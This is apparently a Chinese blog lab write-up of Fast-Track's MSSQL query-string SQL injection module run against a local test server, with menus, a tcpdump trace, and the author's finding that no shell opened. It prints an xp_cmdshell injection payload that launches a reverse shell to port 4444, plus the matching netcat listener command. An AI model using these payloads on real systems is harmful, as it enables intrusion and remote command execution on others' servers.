MSSQL2K - SQL Injector - Query String Parameter Attack

操作如下:

root@root:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Requirements: PExpect
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This module uses a reverse shell by using the binary2hex method for uploading.
    It does not require FTP or any other service, instead we are using the debug
    function in Windows to generate the executable.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

    <ctrl>-c to exit to Main Menu...

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated.  Use the subprocess module.
  ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload (1/4)....
    Sending second portion of payload (2/4)....
    Sending third portion of payload (3/4)...
    Sending the last portion of the payload (4/4)...
    Running cleanup before executing the payload...
    Running the payload on the server...
     You should have a shell if everything went good..Might take a couple seconds

然后就没有了,没有获得shell。

于是,查看代码fasttrack/bin/ftsrc/sqlbinarypayload.py,看到:

string26=(r"';exec master..xp_cmdshell 'reverse.exe %s 4444'--" % (ipaddr))

而且我的eclipse里的输入如下:

select username, password, phone from tb_user where username='';exec master..xp_cmdshell 'reverse.exe 192.168.1.11 4444'--' and password='null'

用wireshark和tcpdump抓包:

MSSQL2K - SQL Injector - Query String Parameter Attack_第1张图片

tcpdump的输入如下:

root@root:/pentest/exploits/fasttrack# tcpdump port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
19:54:33.188133 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.188160 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1697364906, win 0, length 0
19:54:33.633652 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.633679 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:54:34.180136 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:34.180159 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:27.385923 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.385983 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 4267102229, win 0, length 0
19:57:27.867489 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.867577 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:28.414365 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:28.414434 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 1, win 0, length 0

说明:TCP连接是打开的,但是没有打开shell,再看代码fasttrack/bin/menu/sqlinjector.py:

   if menu == '1':
      try:
         reload(sqlbinarypayload)
      except Exception:
         pass
      import sqlbinarypayload

之后,似乎没有代码来处理建立的TCP连接。所以,没有获得shell。


你可能感兴趣的:(MSSQL2K - SQL Injector - Query String Parameter Attack)